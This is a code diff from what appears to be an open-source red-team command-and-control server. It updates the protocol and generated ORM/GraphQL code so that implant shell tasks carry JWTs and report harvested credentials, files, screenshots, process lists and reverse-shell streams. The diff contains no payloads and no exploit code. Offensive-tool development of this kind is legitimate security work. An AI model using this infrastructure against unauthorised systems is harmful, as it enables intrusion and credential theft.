0x05, 0x20, 0x01, 0x28, 0x04, 0x52, 0x04, 0x73, + 0x69, 0x7a, 0x65, 0x12, 0x22, 0x0a, 0x0d, 0x73, 0x68, 0x61, 0x33, 0x5f, 0x32, 0x35, 0x36, 0x5f, + 0x68, 0x61, 0x73, 0x68, 0x18, 0x06, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x73, 0x68, 0x61, 0x33, + 0x32, 0x35, 0x36, 0x48, 0x61, 0x73, 0x68, 0x22, 0x50, 0x0a, 0x04, 0x46, 0x69, 0x6c, 0x65, 0x12, + 0x32, 0x0a, 0x08, 0x6d, 0x65, 0x74, 0x61, 0x64, 0x61, 0x74, 0x61, 0x18, 0x01, 0x20, 0x01, 0x28, + 0x0b, 0x32, 0x16, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x46, 0x69, 0x6c, + 0x65, 0x4d, 0x65, 0x74, 0x61, 0x64, 0x61, 0x74, 0x61, 0x52, 0x08, 0x6d, 0x65, 0x74, 0x61, 0x64, + 0x61, 0x74, 0x61, 0x12, 0x14, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x18, 0x02, 0x20, 0x01, + 0x28, 0x0c, 0x52, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x42, 0x22, 0x5a, 0x20, 0x72, 0x65, 0x61, + 0x6c, 0x6d, 0x2e, 0x70, 0x75, 0x62, 0x2f, 0x74, 0x61, 0x76, 0x65, 0x72, 0x6e, 0x2f, 0x69, 0x6e, + 0x74, 0x65, 0x72, 0x6e, 0x61, 0x6c, 0x2f, 0x63, 0x32, 0x2f, 0x65, 0x70, 0x62, 0x62, 0x06, 0x70, + 0x72, 0x6f, 0x74, 0x6f, 0x33, +}) var ( file_eldritch_proto_rawDescOnce sync.Once diff --git a/tavern/internal/c2/proto/c2.proto b/tavern/internal/c2/proto/c2.proto index 168d4480a..f0c02d848 100644 --- a/tavern/internal/c2/proto/c2.proto +++ b/tavern/internal/c2/proto/c2.proto @@ -80,6 +80,7 @@ message ShellTask { int64 shell_id = 3; uint64 sequence_id = 4; string stream_id = 5; + string jwt = 6; } // TaskError provides information when task execution fails. @@ -100,6 +101,10 @@ message TaskOutput { google.protobuf.Timestamp exec_finished_at = 5; } +message ShellTaskError { + string msg = 1; +} + message ShellTaskOutput { int64 id = 1; string output = 2; @@ -118,6 +123,10 @@ message TaskContext { string jwt = 2; } +message ShellTaskContext { + int64 shell_task_id = 1; + string jwt = 2; +} /* * RPC Messages @@ -131,38 +140,69 @@ message ClaimTasksResponse { } message FetchAssetRequest { - string name = 1; - TaskContext context = 2; + oneof context { + TaskContext task_context = 1; + ShellTaskContext shell_task_context = 2; + } + + string name = 3; } message FetchAssetResponse { bytes chunk = 1; } message ReportCredentialRequest { - TaskContext context = 1; - eldritch.Credential credential = 2; + oneof context { + TaskContext task_context = 1; + ShellTaskContext shell_task_context = 2; + } + eldritch.Credential credential = 3; } message ReportCredentialResponse {} +enum ReportFileKind { + REPORT_FILE_KIND_UNSPECIFIED = 0; + REPORT_FILE_KIND_ONDISK = 1; + REPORT_FILE_KIND_SCREENSHOT = 2; +} + message ReportFileRequest { - TaskContext context = 1; - eldritch.File chunk = 2; + oneof context { + TaskContext task_context = 1; + ShellTaskContext shell_task_context = 2; + } + ReportFileKind kind = 3; + eldritch.File chunk = 4; } message ReportFileResponse {} message ReportProcessListRequest { - TaskContext context = 1; - eldritch.ProcessList list = 2; + oneof context { + TaskContext task_context = 1; + ShellTaskContext shell_task_context = 2; + } + eldritch.ProcessList list = 3; } message ReportProcessListResponse {} -message ReportTaskOutputRequest { - TaskOutput output = 1; - TaskContext context = 2; - ShellTaskOutput shell_task_output = 3; +message ReportTaskOutputMessage { + TaskContext context = 1; + TaskOutput output = 2; } -message ReportTaskOutputResponse {} +message ReportShellTaskOutputMessage { + ShellTaskContext context = 1; + ShellTaskOutput output = 2; +} + +message ReportOutputRequest { + oneof message { + ReportTaskOutputMessage task_output = 1; + ReportShellTaskOutputMessage shell_task_output = 2; + } +} + +message ReportOutputResponse {} enum ReverseShellMessageKind { REVERSE_SHELL_MESSAGE_KIND_UNSPECIFIED = 0; @@ -171,9 +211,12 @@ enum ReverseShellMessageKind { } message ReverseShellRequest{ - ReverseShellMessageKind kind = 1; - bytes data = 2; - TaskContext context = 3; + oneof context { + TaskContext task_context = 1; + ShellTaskContext shell_task_context = 2; + } + ReverseShellMessageKind kind = 3; + bytes data = 4; } message ReverseShellResponse{ ReverseShellMessageKind kind = 1; @@ -181,11 +224,14 @@ message ReverseShellResponse{ } message CreatePortalRequest { - TaskContext context = 1; - portal.Mote mote = 2; + oneof context { + TaskContext task_context = 1; + ShellTaskContext shell_task_context = 2; + } + portal.Mote mote = 3; } message CreatePortalResponse { - portal.Mote mote = 2; + portal.Mote mote = 1; } /* @@ -232,9 +278,9 @@ service C2 { rpc ReportProcessList(ReportProcessListRequest) returns (ReportProcessListResponse); /* - * Report execution output for a task. + * Report execution output. */ - rpc ReportTaskOutput(ReportTaskOutputRequest) returns (ReportTaskOutputResponse) {} + rpc ReportOutput(ReportOutputRequest) returns (ReportOutputResponse) {} /* * Open a reverse shell bi-directional stream. diff --git a/tavern/internal/c2/reverse_shell_e2e_test.go b/tavern/internal/c2/reverse_shell_e2e_test.go index a30ca470e..98331cb67 100644 --- a/tavern/internal/c2/reverse_shell_e2e_test.go +++ b/tavern/internal/c2/reverse_shell_e2e_test.go @@ -24,6 +24,7 @@ import ( "realm.pub/tavern/internal/ent/enttest" "realm.pub/tavern/internal/http/stream" "realm.pub/tavern/internal/portals/mux" + "github.com/golang-jwt/jwt/v5" _ "github.com/mattn/go-sqlite3" ) @@ -110,9 +111,23 @@ func TestReverseShell_E2E(t *testing.T) { gRPCStream, err := c2Client.ReverseShell(ctx) require.NoError(t, err) + // Generate JWT + claims := jwt.MapClaims{ + "iat": time.Now().Unix(), + "exp": time.Now().Add(1 * time.Hour).Unix(), + } + token := jwt.NewWithClaims(jwt.SigningMethodEdDSA, claims) + signedToken, err := token.SignedString(testPrivKey) + require.NoError(t, err) + // Register gRPC stream with task ID err = gRPCStream.Send(&c2pb.ReverseShellRequest{ - Context: &c2pb.TaskContext{TaskId: int64(task.ID)}, + Context: &c2pb.ReverseShellRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{ + TaskId: int64(task.ID), + Jwt: signedToken, + }, + }, }) require.NoError(t, err) diff --git a/tavern/internal/ent/client.go b/tavern/internal/ent/client.go index 1e183b724..f778d9700 100644 --- a/tavern/internal/ent/client.go +++ b/tavern/internal/ent/client.go @@ -1378,6 +1378,22 @@ func (c *HostCredentialClient) QueryTask(hc *HostCredential) *TaskQuery { return query } +// QueryShellTask queries the shell_task edge of a HostCredential. +func (c *HostCredentialClient) QueryShellTask(hc *HostCredential) *ShellTaskQuery { + query := (&ShellTaskClient{config: c.config}).Query() + query.path = func(context.Context) (fromV *sql.Selector, _ error) { + id := hc.ID + step := sqlgraph.NewStep( + sqlgraph.From(hostcredential.Table, hostcredential.FieldID, id), + sqlgraph.To(shelltask.Table, shelltask.FieldID), + sqlgraph.Edge(sqlgraph.M2O, true, hostcredential.ShellTaskTable, hostcredential.ShellTaskColumn), + ) + fromV = sqlgraph.Neighbors(hc.driver.Dialect(), step) + return fromV, nil + } + return query +} + // Hooks returns the client hooks. func (c *HostCredentialClient) Hooks() []Hook { return c.hooks.HostCredential @@ -1543,6 +1559,22 @@ func (c *HostFileClient) QueryTask(hf *HostFile) *TaskQuery { return query } +// QueryShellTask queries the shell_task edge of a HostFile. +func (c *HostFileClient) QueryShellTask(hf *HostFile) *ShellTaskQuery { + query := (&ShellTaskClient{config: c.config}).Query() + query.path = func(context.Context) (fromV *sql.Selector, _ error) { + id := hf.ID + step := sqlgraph.NewStep( + sqlgraph.From(hostfile.Table, hostfile.FieldID, id), + sqlgraph.To(shelltask.Table, shelltask.FieldID), + sqlgraph.Edge(sqlgraph.M2O, true, hostfile.ShellTaskTable, hostfile.ShellTaskColumn), + ) + fromV = sqlgraph.Neighbors(hf.driver.Dialect(), step) + return fromV, nil + } + return query +} + // Hooks returns the client hooks. func (c *HostFileClient) Hooks() []Hook { hooks := c.hooks.HostFile @@ -1709,6 +1741,22 @@ func (c *HostProcessClient) QueryTask(hp *HostProcess) *TaskQuery { return query } +// QueryShellTask queries the shell_task edge of a HostProcess. +func (c *HostProcessClient) QueryShellTask(hp *HostProcess) *ShellTaskQuery { + query := (&ShellTaskClient{config: c.config}).Query() + query.path = func(context.Context) (fromV *sql.Selector, _ error) { + id := hp.ID + step := sqlgraph.NewStep( + sqlgraph.From(hostprocess.Table, hostprocess.FieldID, id), + sqlgraph.To(shelltask.Table, shelltask.FieldID), + sqlgraph.Edge(sqlgraph.M2O, true, hostprocess.ShellTaskTable, hostprocess.ShellTaskColumn), + ) + fromV = sqlgraph.Neighbors(hp.driver.Dialect(), step) + return fromV, nil + } + return query +} + // Hooks returns the client hooks. func (c *HostProcessClient) Hooks() []Hook { return c.hooks.HostProcess @@ -2023,6 +2071,22 @@ func (c *PortalClient) QueryTask(po *Portal) *TaskQuery { return query } +// QueryShellTask queries the shell_task edge of a Portal. +func (c *PortalClient) QueryShellTask(po *Portal) *ShellTaskQuery { + query := (&ShellTaskClient{config: c.config}).Query() + query.path = func(context.Context) (fromV *sql.Selector, _ error) { + id := po.ID + step := sqlgraph.NewStep( + sqlgraph.From(portal.Table, portal.FieldID, id), + sqlgraph.To(shelltask.Table, shelltask.FieldID), + sqlgraph.Edge(sqlgraph.M2O, false, portal.ShellTaskTable, portal.ShellTaskColumn), + ) + fromV = sqlgraph.Neighbors(po.driver.Dialect(), step) + return fromV, nil + } + return query +} + // QueryBeacon queries the beacon edge of a Portal. func (c *PortalClient) QueryBeacon(po *Portal) *BeaconQuery { query := (&BeaconClient{config: c.config}).Query() @@ -2828,6 +2892,54 @@ func (c *ShellTaskClient) QueryCreator(st *ShellTask) *UserQuery { return query } +// QueryReportedCredentials queries the reported_credentials edge of a ShellTask. +func (c *ShellTaskClient) QueryReportedCredentials(st *ShellTask) *HostCredentialQuery { + query := (&HostCredentialClient{config: c.config}).Query() + query.path = func(context.Context) (fromV *sql.Selector, _ error) { + id := st.ID + step := sqlgraph.NewStep( + sqlgraph.From(shelltask.Table, shelltask.FieldID, id), + sqlgraph.To(hostcredential.Table, hostcredential.FieldID), + sqlgraph.Edge(sqlgraph.O2M, false, shelltask.ReportedCredentialsTable, shelltask.ReportedCredentialsColumn), + ) + fromV = sqlgraph.Neighbors(st.driver.Dialect(), step) + return fromV, nil + } + return query +} + +// QueryReportedFiles queries the reported_files edge of a ShellTask. +func (c *ShellTaskClient) QueryReportedFiles(st *ShellTask) *HostFileQuery { + query := (&HostFileClient{config: c.config}).Query() + query.path = func(context.Context) (fromV *sql.Selector, _ error) { + id := st.ID + step := sqlgraph.NewStep( + sqlgraph.From(shelltask.Table, shelltask.FieldID, id), + sqlgraph.To(hostfile.Table, hostfile.FieldID), + sqlgraph.Edge(sqlgraph.O2M, false, shelltask.ReportedFilesTable, shelltask.ReportedFilesColumn), + ) + fromV = sqlgraph.Neighbors(st.driver.Dialect(), step) + return fromV, nil + } + return query +} + +// QueryReportedProcesses queries the reported_processes edge of a ShellTask. +func (c *ShellTaskClient) QueryReportedProcesses(st *ShellTask) *HostProcessQuery { + query := (&HostProcessClient{config: c.config}).Query() + query.path = func(context.Context) (fromV *sql.Selector, _ error) { + id := st.ID + step := sqlgraph.NewStep( + sqlgraph.From(shelltask.Table, shelltask.FieldID, id), + sqlgraph.To(hostprocess.Table, hostprocess.FieldID), + sqlgraph.Edge(sqlgraph.O2M, false, shelltask.ReportedProcessesTable, shelltask.ReportedProcessesColumn), + ) + fromV = sqlgraph.Neighbors(st.driver.Dialect(), step) + return fromV, nil + } + return query +} + // Hooks returns the client hooks. func (c *ShellTaskClient) Hooks() []Hook { return c.hooks.ShellTask diff --git a/tavern/internal/ent/gql_collection.go b/tavern/internal/ent/gql_collection.go index d5c2f3049..299b0eecb 100644 --- a/tavern/internal/ent/gql_collection.go +++ b/tavern/internal/ent/gql_collection.go @@ -1695,6 +1695,17 @@ func (hc *HostCredentialQuery) collectField(ctx context.Context, oneNode bool, o return err } hc.withTask = query + + case "shellTask": + var ( + alias = field.Alias + path = append(path, alias) + query = (&ShellTaskClient{config: hc.config}).Query() + ) + if err := query.collectField(ctx, oneNode, opCtx, field, path, mayAddCondition(satisfies, shelltaskImplementors)...); err != nil { + return err + } + hc.withShellTask = query case "createdAt": if _, ok := fieldSeen[hostcredential.FieldCreatedAt]; !ok { selectedFields = append(selectedFields, hostcredential.FieldCreatedAt) @@ -1832,6 +1843,17 @@ func (hf *HostFileQuery) collectField(ctx context.Context, oneNode bool, opCtx * return err } hf.withTask = query + + case "shellTask": + var ( + alias = field.Alias + path = append(path, alias) + query = (&ShellTaskClient{config: hf.config}).Query() + ) + if err := query.collectField(ctx, oneNode, opCtx, field, path, mayAddCondition(satisfies, shelltaskImplementors)...); err != nil { + return err + } + hf.withShellTask = query case "createdAt": if _, ok := fieldSeen[hostfile.FieldCreatedAt]; !ok { selectedFields = append(selectedFields, hostfile.FieldCreatedAt) @@ -1984,6 +2006,17 @@ func (hp *HostProcessQuery) collectField(ctx context.Context, oneNode bool, opCt return err } hp.withTask = query + + case "shellTask": + var ( + alias = field.Alias + path = append(path, alias) + query = (&ShellTaskClient{config: hp.config}).Query() + ) + if err := query.collectField(ctx, oneNode, opCtx, field, path, mayAddCondition(satisfies, shelltaskImplementors)...); err != nil { + return err + } + hp.withShellTask = query case "createdAt": if _, ok := fieldSeen[hostprocess.FieldCreatedAt]; !ok { selectedFields = append(selectedFields, hostprocess.FieldCreatedAt) @@ -2283,6 +2316,17 @@ func (po *PortalQuery) collectField(ctx context.Context, oneNode bool, opCtx *gr } po.withTask = query + case "shellTask": + var ( + alias = field.Alias + path = append(path, alias) + query = (&ShellTaskClient{config: po.config}).Query() + ) + if err := query.collectField(ctx, oneNode, opCtx, field, path, mayAddCondition(satisfies, shelltaskImplementors)...); err != nil { + return err + } + po.withShellTask = query + case "beacon": var ( alias = field.Alias @@ -2348,10 +2392,10 @@ func (po *PortalQuery) collectField(ctx context.Context, oneNode bool, opCtx *gr } for i := range nodes { n := m[nodes[i].ID] - if nodes[i].Edges.totalCount[3] == nil { - nodes[i].Edges.totalCount[3] = make(map[string]int) + if nodes[i].Edges.totalCount[4] == nil { + nodes[i].Edges.totalCount[4] = make(map[string]int) } - nodes[i].Edges.totalCount[3][alias] = n + nodes[i].Edges.totalCount[4][alias] = n } return nil }) @@ -2359,10 +2403,10 @@ func (po *PortalQuery) collectField(ctx context.Context, oneNode bool, opCtx *gr po.loadTotal = append(po.loadTotal, func(_ context.Context, nodes []*Portal) error { for i := range nodes { n := len(nodes[i].Edges.ActiveUsers) - if nodes[i].Edges.totalCount[3] == nil { - nodes[i].Edges.totalCount[3] = make(map[string]int) + if nodes[i].Edges.totalCount[4] == nil { + nodes[i].Edges.totalCount[4] = make(map[string]int) } - nodes[i].Edges.totalCount[3][alias] = n + nodes[i].Edges.totalCount[4][alias] = n } return nil }) @@ -3310,6 +3354,45 @@ func (st *ShellTaskQuery) collectField(ctx context.Context, oneNode bool, opCtx return err } st.withCreator = query + + case "reportedCredentials": + var ( + alias = field.Alias + path = append(path, alias) + query = (&HostCredentialClient{config: st.config}).Query() + ) + if err := query.collectField(ctx, false, opCtx, field, path, mayAddCondition(satisfies, hostcredentialImplementors)...); err != nil { + return err + } + st.WithNamedReportedCredentials(alias, func(wq *HostCredentialQuery) { + *wq = *query + }) + + case "reportedFiles": + var ( + alias = field.Alias + path = append(path, alias) + query = (&HostFileClient{config: st.config}).Query() + ) + if err := query.collectField(ctx, false, opCtx, field, path, mayAddCondition(satisfies, hostfileImplementors)...); err != nil { + return err + } + st.WithNamedReportedFiles(alias, func(wq *HostFileQuery) { + *wq = *query + }) + + case "reportedProcesses": + var ( + alias = field.Alias + path = append(path, alias) + query = (&HostProcessClient{config: st.config}).Query() + ) + if err := query.collectField(ctx, false, opCtx, field, path, mayAddCondition(satisfies, hostprocessImplementors)...); err != nil { + return err + } + st.WithNamedReportedProcesses(alias, func(wq *HostProcessQuery) { + *wq = *query + }) case "createdAt": if _, ok := fieldSeen[shelltask.FieldCreatedAt]; !ok { selectedFields = append(selectedFields, shelltask.FieldCreatedAt) diff --git a/tavern/internal/ent/gql_edge.go b/tavern/internal/ent/gql_edge.go index 6e70a1371..320f5c627 100644 --- a/tavern/internal/ent/gql_edge.go +++ b/tavern/internal/ent/gql_edge.go @@ -266,6 +266,14 @@ func (hc *HostCredential) Task(ctx context.Context) (*Task, error) { return result, MaskNotFound(err) } +func (hc *HostCredential) ShellTask(ctx context.Context) (*ShellTask, error) { + result, err := hc.Edges.ShellTaskOrErr() + if IsNotLoaded(err) { + result, err = hc.QueryShellTask().Only(ctx) + } + return result, MaskNotFound(err) +} + func (hf *HostFile) Host(ctx context.Context) (*Host, error) { result, err := hf.Edges.HostOrErr() if IsNotLoaded(err) { @@ -279,7 +287,15 @@ func (hf *HostFile) Task(ctx context.Context) (*Task, error) { if IsNotLoaded(err) { result, err = hf.QueryTask().Only(ctx) } - return result, err + return result, MaskNotFound(err) +} + +func (hf *HostFile) ShellTask(ctx context.Context) (*ShellTask, error) { + result, err := hf.Edges.ShellTaskOrErr() + if IsNotLoaded(err) { + result, err = hf.QueryShellTask().Only(ctx) + } + return result, MaskNotFound(err) } func (hp *HostProcess) Host(ctx context.Context) (*Host, error) { @@ -295,7 +311,15 @@ func (hp *HostProcess) Task(ctx context.Context) (*Task, error) { if IsNotLoaded(err) { result, err = hp.QueryTask().Only(ctx) } - return result, err + return result, MaskNotFound(err) +} + +func (hp *HostProcess) ShellTask(ctx context.Context) (*ShellTask, error) { + result, err := hp.Edges.ShellTaskOrErr() + if IsNotLoaded(err) { + result, err = hp.QueryShellTask().Only(ctx) + } + return result, MaskNotFound(err) } func (l *Link) Asset(ctx context.Context) (*Asset, error) { @@ -319,7 +343,15 @@ func (po *Portal) Task(ctx context.Context) (*Task, error) { if IsNotLoaded(err) { result, err = po.QueryTask().Only(ctx) } - return result, err + return result, MaskNotFound(err) +} + +func (po *Portal) ShellTask(ctx context.Context) (*ShellTask, error) { + result, err := po.Edges.ShellTaskOrErr() + if IsNotLoaded(err) { + result, err = po.QueryShellTask().Only(ctx) + } + return result, MaskNotFound(err) } func (po *Portal) Beacon(ctx context.Context) (*Beacon, error) { @@ -346,7 +378,7 @@ func (po *Portal) ActiveUsers( WithUserFilter(where.Filter), } alias := graphql.GetFieldContext(ctx).Field.Alias - totalCount, hasTotalCount := po.Edges.totalCount[3][alias] + totalCount, hasTotalCount := po.Edges.totalCount[4][alias] if nodes, err := po.NamedActiveUsers(alias); err == nil || hasTotalCount { pager, err := newUserPager(opts, last != nil) if err != nil { @@ -527,6 +559,42 @@ func (st *ShellTask) Creator(ctx context.Context) (*User, error) { return result, err } +func (st *ShellTask) ReportedCredentials(ctx context.Context) (result []*HostCredential, err error) { + if fc := graphql.GetFieldContext(ctx); fc != nil && fc.Field.Alias != "" { + result, err = st.NamedReportedCredentials(graphql.GetFieldContext(ctx).Field.Alias) + } else { + result, err = st.Edges.ReportedCredentialsOrErr() + } + if IsNotLoaded(err) { + result, err = st.QueryReportedCredentials().All(ctx) + } + return result, err +} + +func (st *ShellTask) ReportedFiles(ctx context.Context) (result []*HostFile, err error) { + if fc := graphql.GetFieldContext(ctx); fc != nil && fc.Field.Alias != "" { + result, err = st.NamedReportedFiles(graphql.GetFieldContext(ctx).Field.Alias) + } else { + result, err = st.Edges.ReportedFilesOrErr() + } + if IsNotLoaded(err) { + result, err = st.QueryReportedFiles().All(ctx) + } + return result, err +} + +func (st *ShellTask) ReportedProcesses(ctx context.Context) (result []*HostProcess, err error) { + if fc := graphql.GetFieldContext(ctx); fc != nil && fc.Field.Alias != "" { + result, err = st.NamedReportedProcesses(graphql.GetFieldContext(ctx).Field.Alias) + } else { + result, err = st.Edges.ReportedProcessesOrErr() + } + if IsNotLoaded(err) { + result, err = st.QueryReportedProcesses().All(ctx) + } + return result, err +} + func (t *Tag) Hosts( ctx context.Context, after *Cursor, first *int, before *Cursor, last *int, orderBy []*HostOrder, where *HostWhereInput, ) (*HostConnection, error) { diff --git a/tavern/internal/ent/gql_mutation_input.go b/tavern/internal/ent/gql_mutation_input.go index 1348bd9f7..c395ee814 100644 --- a/tavern/internal/ent/gql_mutation_input.go +++ b/tavern/internal/ent/gql_mutation_input.go @@ -155,11 +155,12 @@ func (c *HostUpdateOne) SetInput(i UpdateHostInput) *HostUpdateOne { // CreateHostCredentialInput represents a mutation input for creating hostcredentials. type CreateHostCredentialInput struct { - Principal string - Secret string - Kind epb.Credential_Kind - HostID int - TaskID *int + Principal string + Secret string + Kind epb.Credential_Kind + HostID int + TaskID *int + ShellTaskID *int } // Mutate applies the CreateHostCredentialInput on the HostCredentialMutation builder. @@ -171,6 +172,9 @@ func (i *CreateHostCredentialInput) Mutate(m *HostCredentialMutation) { if v := i.TaskID; v != nil { m.SetTaskID(*v) } + if v := i.ShellTaskID; v != nil { + m.SetShellTaskID(*v) + } } // SetInput applies the change-set in the CreateHostCredentialInput on the HostCredentialCreate builder. diff --git a/tavern/internal/ent/gql_where_input.go b/tavern/internal/ent/gql_where_input.go index 535515030..8fd36793d 100644 --- a/tavern/internal/ent/gql_where_input.go +++ b/tavern/internal/ent/gql_where_input.go @@ -2955,6 +2955,10 @@ type HostCredentialWhereInput struct { // "task" edge predicates. HasTask *bool `json:"hasTask,omitempty"` HasTaskWith []*TaskWhereInput `json:"hasTaskWith,omitempty"` + + // "shell_task" edge predicates. + HasShellTask *bool `json:"hasShellTask,omitempty"` + HasShellTaskWith []*ShellTaskWhereInput `json:"hasShellTaskWith,omitempty"` } // AddPredicates adds custom predicates to the where input to be used during the filtering phase. @@ -3227,6 +3231,24 @@ func (i *HostCredentialWhereInput) P() (predicate.HostCredential, error) { } predicates = append(predicates, hostcredential.HasTaskWith(with...)) } + if i.HasShellTask != nil { + p := hostcredential.HasShellTask() + if !*i.HasShellTask { + p = hostcredential.Not(p) + } + predicates = append(predicates, p) + } + if len(i.HasShellTaskWith) > 0 { + with := make([]predicate.ShellTask, 0, len(i.HasShellTaskWith)) + for _, w := range i.HasShellTaskWith { + p, err := w.P() + if err != nil { + return nil, fmt.Errorf("%w: field 'HasShellTaskWith'", err) + } + with = append(with, p) + } + predicates = append(predicates, hostcredential.HasShellTaskWith(with...)) + } switch len(predicates) { case 0: return nil, ErrEmptyHostCredentialWhereInput @@ -3374,6 +3396,10 @@ type HostFileWhereInput struct { // "task" edge predicates. HasTask *bool `json:"hasTask,omitempty"` HasTaskWith []*TaskWhereInput `json:"hasTaskWith,omitempty"` + + // "shell_task" edge predicates. + HasShellTask *bool `json:"hasShellTask,omitempty"` + HasShellTaskWith []*ShellTaskWhereInput `json:"hasShellTaskWith,omitempty"` } // AddPredicates adds custom predicates to the where input to be used during the filtering phase. @@ -3799,6 +3825,24 @@ func (i *HostFileWhereInput) P() (predicate.HostFile, error) { } predicates = append(predicates, hostfile.HasTaskWith(with...)) } + if i.HasShellTask != nil { + p := hostfile.HasShellTask() + if !*i.HasShellTask { + p = hostfile.Not(p) + } + predicates = append(predicates, p) + } + if len(i.HasShellTaskWith) > 0 { + with := make([]predicate.ShellTask, 0, len(i.HasShellTaskWith)) + for _, w := range i.HasShellTaskWith { + p, err := w.P() + if err != nil { + return nil, fmt.Errorf("%w: field 'HasShellTaskWith'", err) + } + with = append(with, p) + } + predicates = append(predicates, hostfile.HasShellTaskWith(with...)) + } switch len(predicates) { case 0: return nil, ErrEmptyHostFileWhereInput @@ -3977,6 +4021,10 @@ type HostProcessWhereInput struct { // "task" edge predicates. HasTask *bool `json:"hasTask,omitempty"` HasTaskWith []*TaskWhereInput `json:"hasTaskWith,omitempty"` + + // "shell_task" edge predicates. + HasShellTask *bool `json:"hasShellTask,omitempty"` + HasShellTaskWith []*ShellTaskWhereInput `json:"hasShellTaskWith,omitempty"` } // AddPredicates adds custom predicates to the where input to be used during the filtering phase. @@ -4477,6 +4525,24 @@ func (i *HostProcessWhereInput) P() (predicate.HostProcess, error) { } predicates = append(predicates, hostprocess.HasTaskWith(with...)) } + if i.HasShellTask != nil { + p := hostprocess.HasShellTask() + if !*i.HasShellTask { + p = hostprocess.Not(p) + } + predicates = append(predicates, p) + } + if len(i.HasShellTaskWith) > 0 { + with := make([]predicate.ShellTask, 0, len(i.HasShellTaskWith)) + for _, w := range i.HasShellTaskWith { + p, err := w.P() + if err != nil { + return nil, fmt.Errorf("%w: field 'HasShellTaskWith'", err) + } + with = append(with, p) + } + predicates = append(predicates, hostprocess.HasShellTaskWith(with...)) + } switch len(predicates) { case 0: return nil, ErrEmptyHostProcessWhereInput @@ -4940,6 +5006,10 @@ type PortalWhereInput struct { HasTask *bool `json:"hasTask,omitempty"` HasTaskWith []*TaskWhereInput `json:"hasTaskWith,omitempty"` + // "shell_task" edge predicates. + HasShellTask *bool `json:"hasShellTask,omitempty"` + HasShellTaskWith []*ShellTaskWhereInput `json:"hasShellTaskWith,omitempty"` + // "beacon" edge predicates. HasBeacon *bool `json:"hasBeacon,omitempty"` HasBeaconWith []*BeaconWhereInput `json:"hasBeaconWith,omitempty"` @@ -5145,6 +5215,24 @@ func (i *PortalWhereInput) P() (predicate.Portal, error) { } predicates = append(predicates, portal.HasTaskWith(with...)) } + if i.HasShellTask != nil { + p := portal.HasShellTask() + if !*i.HasShellTask { + p = portal.Not(p) + } + predicates = append(predicates, p) + } + if len(i.HasShellTaskWith) > 0 { + with := make([]predicate.ShellTask, 0, len(i.HasShellTaskWith)) + for _, w := range i.HasShellTaskWith { + p, err := w.P() + if err != nil { + return nil, fmt.Errorf("%w: field 'HasShellTaskWith'", err) + } + with = append(with, p) + } + predicates = append(predicates, portal.HasShellTaskWith(with...)) + } if i.HasBeacon != nil { p := portal.HasBeacon() if !*i.HasBeacon { @@ -6635,6 +6723,18 @@ type ShellTaskWhereInput struct { // "creator" edge predicates. HasCreator *bool `json:"hasCreator,omitempty"` HasCreatorWith []*UserWhereInput `json:"hasCreatorWith,omitempty"` + + // "reported_credentials" edge predicates. + HasReportedCredentials *bool `json:"hasReportedCredentials,omitempty"` + HasReportedCredentialsWith []*HostCredentialWhereInput `json:"hasReportedCredentialsWith,omitempty"` + + // "reported_files" edge predicates. + HasReportedFiles *bool `json:"hasReportedFiles,omitempty"` + HasReportedFilesWith []*HostFileWhereInput `json:"hasReportedFilesWith,omitempty"` + + // "reported_processes" edge predicates. + HasReportedProcesses *bool `json:"hasReportedProcesses,omitempty"` + HasReportedProcessesWith []*HostProcessWhereInput `json:"hasReportedProcessesWith,omitempty"` } // AddPredicates adds custom predicates to the where input to be used during the filtering phase. @@ -7099,6 +7199,60 @@ func (i *ShellTaskWhereInput) P() (predicate.ShellTask, error) { } predicates = append(predicates, shelltask.HasCreatorWith(with...)) } + if i.HasReportedCredentials != nil { + p := shelltask.HasReportedCredentials() + if !*i.HasReportedCredentials { + p = shelltask.Not(p) + } + predicates = append(predicates, p) + } + if len(i.HasReportedCredentialsWith) > 0 { + with := make([]predicate.HostCredential, 0, len(i.HasReportedCredentialsWith)) + for _, w := range i.HasReportedCredentialsWith { + p, err := w.P() + if err != nil { + return nil, fmt.Errorf("%w: field 'HasReportedCredentialsWith'", err) + } + with = append(with, p) + } + predicates = append(predicates, shelltask.HasReportedCredentialsWith(with...)) + } + if i.HasReportedFiles != nil { + p := shelltask.HasReportedFiles() + if !*i.HasReportedFiles { + p = shelltask.Not(p) + } + predicates = append(predicates, p) + } + if len(i.HasReportedFilesWith) > 0 { + with := make([]predicate.HostFile, 0, len(i.HasReportedFilesWith)) + for _, w := range i.HasReportedFilesWith { + p, err := w.P() + if err != nil { + return nil, fmt.Errorf("%w: field 'HasReportedFilesWith'", err) + } + with = append(with, p) + } + predicates = append(predicates, shelltask.HasReportedFilesWith(with...)) + } + if i.HasReportedProcesses != nil { + p := shelltask.HasReportedProcesses() + if !*i.HasReportedProcesses { + p = shelltask.Not(p) + } + predicates = append(predicates, p) + } + if len(i.HasReportedProcessesWith) > 0 { + with := make([]predicate.HostProcess, 0, len(i.HasReportedProcessesWith)) + for _, w := range i.HasReportedProcessesWith { + p, err := w.P() + if err != nil { + return nil, fmt.Errorf("%w: field 'HasReportedProcessesWith'", err) + } + with = append(with, p) + } + predicates = append(predicates, shelltask.HasReportedProcessesWith(with...)) + } switch len(predicates) { case 0: return nil, ErrEmptyShellTaskWhereInput diff --git a/tavern/internal/ent/hostcredential.go b/tavern/internal/ent/hostcredential.go index d80dc1cb4..74930c3fb 100644 --- a/tavern/internal/ent/hostcredential.go +++ b/tavern/internal/ent/hostcredential.go @@ -12,6 +12,7 @@ import ( "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostcredential" + "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/task" ) @@ -32,10 +33,11 @@ type HostCredential struct { Kind epb.Credential_Kind `json:"kind,omitempty"` // Edges holds the relations/edges for other nodes in the graph. // The values are being populated by the HostCredentialQuery when eager-loading is set. - Edges HostCredentialEdges `json:"edges"` - host_credential_host *int - task_reported_credentials *int - selectValues sql.SelectValues + Edges HostCredentialEdges `json:"edges"` + host_credential_host *int + shell_task_reported_credentials *int + task_reported_credentials *int + selectValues sql.SelectValues } // HostCredentialEdges holds the relations/edges for other nodes in the graph. @@ -44,11 +46,13 @@ type HostCredentialEdges struct { 